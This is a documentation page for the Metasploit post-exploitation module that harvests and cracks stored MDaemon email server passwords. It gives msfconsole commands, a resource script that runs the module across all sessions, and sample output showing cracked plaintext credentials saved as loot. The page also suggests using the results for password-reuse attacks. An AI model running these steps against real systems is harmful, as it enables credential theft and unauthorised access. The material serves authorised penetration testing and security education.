Windows Gather MDaemonEmailServer Credential Cracking - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/mdaemon_cred_collector metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather MDaemonEmailServer Credential Cracking
Module: post/windows/gather/credentials/mdaemon_cred_collector
Source code: modules/post/windows/gather/credentials/mdaemon_cred_collector.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): x86, x64
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

Finds and cracks the stored passwords of MDaemon Email Server

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/mdaemon_cred_collector

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/mdaemon_cred_collector
msf post(mdaemon_cred_collector) > show options
    ... show and set options ...
msf post(mdaemon_cred_collector) > set SESSION session-id
msf post(mdaemon_cred_collector) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/mdaemon_cred_collector")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


Download and install the email server: www.altn.com

You require a valid licence, but there's a demo for 30 days.

Verified

  1. AWS --> Microsoft Windows Server 2012 R2 Base - ami-8d0acfed Instance: t2.micro @ July-August 2016 x64 bits with meterpreter 64 bits.
  2. AWS --> Microsoft Windows Server 2012 R2 Base - ami-8d0acfed Instance: t2.micro @ July-August 2016 x64 bits with meterpreter 32 bits. Worked, but couldn't find the path through Register.
  3. VM --> Microsoft Windows 7 on VMWare.

Verification Steps


  1. Get a meterpreter on a windows machine that has MDaemon installed.
  2. Load the module: use post/windows/gather/credentials/mdaemon_cred_collector
  3. Set the correct session on the module.
    1. Optional: you can add the remote path of the installation, especially if the software is installed on a strange path and the module can't find it..
  4. Run the module and enjoy the loot.

Options


RPATH The remote path of the MDaemon installation. If the machine runs on 64bits and the meterpreter is 32 bits, it won't be able to find the installation path in the registry, but it will search some default paths. If it is installed on a non-default path you can give the RPATH and it will work.

Scenarios


Normal mode msf > use post/windows/gather/credentials/mdaemon_cred_collector msf > set SESSION 1 msf > exploit

Output:

[+] Configuration file found: C:\MDaemon\App\userlist.dat
[+] Found MDaemons on WIN-F7ANP3JL4GJ via session ID: 1
[*]     Extracted: MDaemon:p0%AhBxvs4IZ
[*]     Extracted: webmaster:Manuel123.
[*] SMTP credentials saved in: /root/.msf4/loot/20160831194802_default_127.0.0.1_MDaemon.smtp_ser_754168.txt
[*]     Extracted: webmaster:Manuel123.
[*] POP3 credentials saved in: /root/.msf4/loot/20160831194802_default_127.0.0.1_MDaemon.pop3_ser_608271.txt
[*]     Extracted: webmaster:Manuel123.
[*] IMAP credentials saved in: /root/.msf4/loot/20160831194802_default_127.0.0.1_MDaemon.imap_ser_769125.txt
[*] Post module execution completed

Verbose true msf > use post/windows/gather/credentials/mdaemon_cred_collector msf > set SESSION 1 msf > set verbose true msf > exploit

Output:

[*] Searching MDaemon installation at C:
[*] Found MDaemon installation at C:
[*] Searching MDaemon installation at C:
[*] Found MDaemon installation at C:
[*] Searching MDaemon installation at C:\Program Files
[*] Searching MDaemon installation at C:\Program Files (x86)
[*] Searching MDaemon installation at C:\Program Files
[*] Checking for Userlist in MDaemons directory at: C:\MDaemon\App
[+] Configuration file found: C:\MDaemon\App\userlist.dat
[+] Found MDaemons on WIN-F7ANP3JL4GJ via session ID: 1
[*] Downloading UserList.dat file to tmp file: SFJOXMHZEFWA
[*] Cracking xJiKYdun7OvjVLnM
[*] Password p0%AhBxvs4IZ
[*] Cracking ocnTldjRpaejTg==
[*] Password Manuel123.
[*] Collected the following credentials:
[*]     Usernames: 2
[*]     Passwords: 2
[*] Deleting tmp file: SFJOXMHZEFWA
[*]     Extracted: MDaemon:p0%AhBxvs4IZ
[*]     Extracted: webmaster:Manuel123.
[*] SMTP credentials saved in: /root/.msf4/loot/20160831194819_default_127.0.0.1_MDaemon.smtp_ser_114741.txt
[*]     Extracted: webmaster:Manuel123.
[*] POP3 credentials saved in: /root/.msf4/loot/20160831194819_default_127.0.0.1_MDaemon.pop3_ser_369240.txt
[*]     Extracted: webmaster:Manuel123.
[*] IMAP credentials saved in: /root/.msf4/loot/20160831194819_default_127.0.0.1_MDaemon.imap_ser_028427.txt
[*] Post module execution completed

Scenarios Extended

Run on all sessions If you wish to run the post against all sessions from framework, here is how:

  1. Create the following resource script: framework.sessions.each_pair do |sid, session| run_single("use post/windows/gather/credentials/mdaemon_cred_collector") run_single("set SESSION #{sid}") run_single("run") end
  2. At the msf prompt, execute the above resource script: msf > resource path-to-resource-script

Meterpreter on email server

If you have a meterpreter running on a server that has MDaemon installed, run the module and you will get all the users and passwords of the email server. Quite useful for trying password reuse and/or checking the strength of the passwords.

Note: MDaemon can store the passwords on a database, in that case the module won't work, but you can search for the database location, username and password and still get them :)

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/mdaemon_cred_collector post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/mdaemon_cred_collector

msf6 post(windows/gather/credentials/mdaemon_cred_collector) > show info

       Name: Windows Gather MDaemonEmailServer Credential Cracking
     Module: post/windows/gather/credentials/mdaemon_cred_collector
   Platform: Windows
       Arch: x86, x64
       Rank: Excellent

Provided by:
  Manuel Nader #AgoraSecurity

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RPATH                     no        Path of the MDaemon installation
  SESSION                   yes       The session to run this module on.

Description:
  Finds and cracks the stored passwords of MDaemon Email Server

References:
  http://www.securityfocus.com/bid/4686

Module Options


This is a complete list of options available in the windows/gather/credentials/mdaemon_cred_collector post exploitation module:

msf6 post(windows/gather/credentials/mdaemon_cred_collector) > show options

Module options (post/windows/gather/credentials/mdaemon_cred_collector):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RPATH                     no        Path of the MDaemon installation
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/mdaemon_cred_collector post exploitation module:

msf6 post(windows/gather/credentials/mdaemon_cred_collector) > show advanced

Module advanced options (post/windows/gather/credentials/mdaemon_cred_collector):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/mdaemon_cred_collector module can do:

msf6 post(windows/gather/credentials/mdaemon_cred_collector) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/mdaemon_cred_collector post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/mdaemon_cred_collector) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Only meterpreter sessions are supported by this post module


Here is a relevant code snippet related to the "Only meterpreter sessions are supported by this post module" error message:

33:	    )
34:	  end
35:	
36:	  def run
37:	    if session.type != 'meterpreter'
38:	      print_error('Only meterpreter sessions are supported by this post module')
39:	      return
40:	    end
41:	
42:	    progfiles_env = session.sys.config.getenvs('SYSTEMDRIVE', 'HOMEDRIVE', 'ProgramFiles', 'ProgramFiles(x86)', 'ProgramW6432')
43:	    locations = ['C:\MDaemon\App']

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Manuel Nader #AgoraSecurity

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.